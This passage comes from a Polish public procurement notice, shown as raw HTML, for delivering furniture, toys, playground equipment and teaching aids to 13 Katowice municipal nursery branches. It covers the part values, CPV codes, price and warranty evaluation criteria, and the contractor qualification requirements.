class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz kryterium dotyczącym okresu gwarancji. <br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów. <br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie i okresie gwarancji, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego -ofert dodatkowych zawierających nową cenę i okres gwarancji wyższy lub taki sam o ile był najwyższy przy składaniu ofert. <br/><br/>Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli z SWZ.<br/>Ocena punktowa - okres gwarancji dokonana zostanie na podstawie okresu gwarancji wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli SWZ.<br/>Ocena ofert w oparciu o kryterium okres gwarancji klasyfikuje się następująco: <br/>1)	36 miesięcy -40 pkt; <br/>2)	24 miesiące- 0 pkt<br/><br/><br/>Kryterium-okres gwarancji rozpatrywane będzie na podstawie zadeklarowanego przez Wykonawcę okresu w Formularzu Oferty.<br/>-Najkrótszy możliwy okres gwarancji -24 miesięce.<br/>-Najdłuższy możliwy okres gwarancji -36 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 Doposażenie placów zabaw<br/>Przedmiotem zamówienia jest Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/><br/>Dostawa zamówień zostanie zrealizowana według faktycznych potrzeb każdego Oddziału Żłobka na podstawie zamówień złożonych przez przedstawiciela Zamawiającego. Zamówienie realizowane będzie w ramach 5 (pięciu) zadań. Przedmiot zamówienia musi być zrealizowany przez Wykonawcę zgodnie ze wskazaniami określonymi przez Zamawiającego: asortymentem, ilościami i wymaganiami określonymi w załączniku do SWZ nr 4.3;<br/>Zamawiający dopuszcza rozwiązania równoważne opisywane w Załączniku od nr 4.1;4.2;4.3;4.4;4.5. do SWZ. <br/>Za ofertę równoważną Zamawiający uzna taką, w której Wykonawca oferuje wyposażenie /artykuły o takich jednakowych parametrach i funkcjach lub zbieżnych do tych, które zostały sprecyzowane w opisie poszczególnych pozycji.<br/>Jeżeli w dokumentacji stanowiącej załączniki do SWZ wskazuje się dla niektórych, wyrobów nazwy, znaki towarowe, patenty lub po¬chodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę to wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko takie znaczenie, że określają minimalne parametry techniczne i jakościowe wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia. Zama¬wiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń, niż wskazane w/w dokumentach z zastrzeżeniem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały, wyroby i urządzenia równoważne). Wykonawca, który przewiduje stosowanie materiałów, wyrobów i urządzeń równoważnych w stosunku do tych wskazanych w dokumentacji ma obowiązek wskazać jakie materiały, wyroby lub urządzenia zastosuje. Jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu zamówienia musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania. Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym. Ciężar wykazania tej zgodności spoczywa na Wykonawcy.<br/> Zamawiający dopuszcza składanie ofert z rozwiązaniami równoważnymi, o ile zapewnią one zgodność realizacji przedmiotu zamówienia z dokumentacją. Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych czy certyfikat, Wykonawca złoży wówczas wraz z ofertą. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 158527,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">37500000-3 - Gry i zabawki, wyposażenie parków zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz kryterium dotyczącym okresu gwarancji. <br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów. <br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie i okresie gwarancji, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego -ofert dodatkowych zawierających nową cenę i okres gwarancji wyższy lub taki sam o ile był najwyższy przy składaniu ofert. <br/><br/>Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli z SWZ.<br/>Ocena punktowa - okres gwarancji dokonana zostanie na podstawie okresu gwarancji wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli SWZ.<br/>Ocena ofert w oparciu o kryterium okres gwarancji klasyfikuje się następująco: <br/>1)	36 miesięcy -40 pkt; <br/>2)	24 miesiące- 0 pkt<br/><br/><br/>Kryterium-okres gwarancji rozpatrywane będzie na podstawie zadeklarowanego przez Wykonawcę okresu w Formularzu Oferty.<br/>-Najkrótszy możliwy okres gwarancji -24 miesięce.<br/>-Najdłuższy możliwy okres gwarancji -36 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4 Wyposażenie gabinetu specjalistów<br/>Przedmiotem zamówienia jest Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/><br/>Dostawa zamówień zostanie zrealizowana według faktycznych potrzeb każdego Oddziału Żłobka na podstawie zamówień złożonych przez przedstawiciela Zamawiającego. Zamówienie realizowane będzie w ramach 5 (pięciu) zadań. Przedmiot zamówienia musi być zrealizowany przez Wykonawcę zgodnie ze wskazaniami określonymi przez Zamawiającego: asortymentem, ilościami i wymaganiami określonymi w załączniku do SWZ nr 4.4;<br/>Zamawiający dopuszcza rozwiązania równoważne opisywane w Załączniku od nr 4.1;4.2;4.3;4.4;4.5. do SWZ. <br/>Za ofertę równoważną Zamawiający uzna taką, w której Wykonawca oferuje wyposażenie /artykuły o takich jednakowych parametrach i funkcjach lub zbieżnych do tych, które zostały sprecyzowane w opisie poszczególnych pozycji.<br/>Jeżeli w dokumentacji stanowiącej załączniki do SWZ wskazuje się dla niektórych, wyrobów nazwy, znaki towarowe, patenty lub po¬chodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę to wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko takie znaczenie, że określają minimalne parametry techniczne i jakościowe wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia. Zama¬wiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń, niż wskazane w/w dokumentach z zastrzeżeniem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały, wyroby i urządzenia równoważne). Wykonawca, który przewiduje stosowanie materiałów, wyrobów i urządzeń równoważnych w stosunku do tych wskazanych w dokumentacji ma obowiązek wskazać jakie materiały, wyroby lub urządzenia zastosuje. Jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu zamówienia musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania. Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym. Ciężar wykazania tej zgodności spoczywa na Wykonawcy.<br/> Zamawiający dopuszcza składanie ofert z rozwiązaniami równoważnymi, o ile zapewnią one zgodność realizacji przedmiotu zamówienia z dokumentacją. Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych czy certyfikat, Wykonawca złoży wówczas wraz z ofertą. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12191,73 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</p> <p class="mb-0">39530000-6 - Dywany, maty i dywaniki</p> <p class="mb-0">37300000-1 - Instrumenty muzyczne i ich części</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz kryterium dotyczącym okresu gwarancji. <br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów. <br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie i okresie gwarancji, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego -ofert dodatkowych zawierających nową cenę i okres gwarancji wyższy lub taki sam o ile był najwyższy przy składaniu ofert. <br/><br/>Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli z SWZ.<br/>Ocena punktowa - okres gwarancji dokonana zostanie na podstawie okresu gwarancji wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli SWZ.<br/>Ocena ofert w oparciu o kryterium okres gwarancji klasyfikuje się następująco: <br/>1)	36 miesięcy -40 pkt; <br/>2)	24 miesiące- 0 pkt<br/><br/><br/>Kryterium-okres gwarancji rozpatrywane będzie na podstawie zadeklarowanego przez Wykonawcę okresu w Formularzu Oferty.<br/>-Najkrótszy możliwy okres gwarancji -24 miesięce.<br/>-Najdłuższy możliwy okres gwarancji -36 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5 Wyposażenie sal -„Doświadczanie świata”<br/>Przedmiotem zamówienia jest Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/><br/>Dostawa zamówień zostanie zrealizowana według faktycznych potrzeb każdego Oddziału Żłobka na podstawie zamówień złożonych przez przedstawiciela Zamawiającego. Zamówienie realizowane będzie w ramach 5 (pięciu) zadań. Przedmiot zamówienia musi być zrealizowany przez Wykonawcę zgodnie ze wskazaniami określonymi przez Zamawiającego: asortymentem, ilościami i wymaganiami określonymi w załączniku do SWZ nr 4.5;<br/>Zamawiający dopuszcza rozwiązania równoważne opisywane w Załączniku od nr 4.1;4.2;4.3;4.4;4.5. do SWZ. <br/>Za ofertę równoważną Zamawiający uzna taką, w której Wykonawca oferuje wyposażenie /artykuły o takich jednakowych parametrach i funkcjach lub zbieżnych do tych, które zostały sprecyzowane w opisie poszczególnych pozycji.<br/>Jeżeli w dokumentacji stanowiącej załączniki do SWZ wskazuje się dla niektórych, wyrobów nazwy, znaki towarowe, patenty lub po¬chodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę to wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko takie znaczenie, że określają minimalne parametry techniczne i jakościowe wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia. Zama¬wiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń, niż wskazane w/w dokumentach z zastrzeżeniem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały, wyroby i urządzenia równoważne). Wykonawca, który przewiduje stosowanie materiałów, wyrobów i urządzeń równoważnych w stosunku do tych wskazanych w dokumentacji ma obowiązek wskazać jakie materiały, wyroby lub urządzenia zastosuje. Jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu zamówienia musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania. Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym. Ciężar wykazania tej zgodności spoczywa na Wykonawcy.<br/> Zamawiający dopuszcza składanie ofert z rozwiązaniami równoważnymi, o ile zapewnią one zgodność realizacji przedmiotu zamówienia z dokumentacją. Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych czy certyfikat, Wykonawca złoży wówczas wraz z ofertą. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 73329,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <p class="mb-0">37500000-3 - Gry i zabawki, wyposażenie parków zabaw</p> <p class="mb-0">31500000-1 - Urządzenia oświetleniowe i lampy elektryczne</p> <p class="mb-0">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz kryterium dotyczącym okresu gwarancji. <br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów. <br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie i okresie gwarancji, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego -ofert dodatkowych zawierających nową cenę i okres gwarancji wyższy lub taki sam o ile był najwyższy przy składaniu ofert. <br/><br/>Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli z SWZ.<br/>Ocena punktowa - okres gwarancji dokonana zostanie na podstawie okresu gwarancji wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli SWZ.<br/>Ocena ofert w oparciu o kryterium okres gwarancji klasyfikuje się następująco: <br/>1)	36 miesięcy -40 pkt; <br/>2)	24 miesiące- 0 pkt<br/><br/><br/>Kryterium-okres gwarancji rozpatrywane będzie na podstawie zadeklarowanego przez Wykonawcę okresu w Formularzu Oferty.<br/>-Najkrótszy możliwy okres gwarancji -24 miesięce.<br/>-Najdłuższy możliwy okres gwarancji -36 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa.<br/>Zamawiający uzna niniejszy warunek za spełniony, jeżeli Wykonawca przedstawi:<br/>a)	wykaz dostaw (załącznik nr 7) lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz wykaz dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/>Wykonawca winien w wykazie dostaw przedstawić wykonanie co najmniej jednej dostawy odpowiadającej swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. Przy czym odpowiednio dla:<br/>Zadanie nr 1	Wyposażenie dodatkowych miejsc dla 32 dzieci.- za cenę łączną min. 43 189,00zł. brutto<br/>Zadanie nr 2	Doposażenie Oddziałów Żłobka za cenę łączną min. zł. 204 991,00 brutto<br/>Zadanie nr 3	Doposażenie placów zabaw za cenę łączną min. zł. 97 494,00 brutto <br/>Zadanie nr 4	Wyposażenie gabinetu specjalistów za cenę łączną min. 7 497,00 zł. brutto<br/>Zadanie nr 5	Wyposażenie sal-„Doświadczanie świata” za cenę łączną min. 44 992,00 zł. brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3, 3a do SWZ.<br/>Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw (załącznik nr 7) lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz wykaz dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/>Wykonawca winien w wykazie dostaw przedstawić wykonanie co najmniej jednej dostawy odpowiadającej swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. Przy czym odpowiednio dla:<br/>Zadanie nr 1	Wyposażenie dodatkowych miejsc dla 32 dzieci.- za cenę łączną min. 43 189,00zł. brutto<br/>Zadanie nr 2	Doposażenie Oddziałów Żłobka za cenę łączną min. zł. 204 991,00 brutto<br/>Zadanie nr 3	Doposażenie placów zabaw za cenę łączną min. zł. 97 494,00 brutto <br/>Zadanie nr 4	Wyposażenie gabinetu specjalistów za cenę łączną min. 7 497,00 zł. brutto<br/>Zadanie nr 5	Wyposażenie sal-„Doświadczanie świata” za cenę łączną min. 44 992,00 zł. brutto</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty stanowiący załącznik nr 2 do SWZ.<br/>2.	Szczegółowy kosztorys cenowy stanowiący załączniki nr 4.1;4.2;4.3;4.4;4.5. do SWZ.<br/>3.	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospo-darczej lub innego właściwego rejestru.<br/>3.1	Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 3. -pełnomocnictwo lub inny dokument (np. akt powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w systemie common law, członka rady dyrektorów spółki, a także umowa spółki cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki) potwierdzający umocowanie do reprezentowania 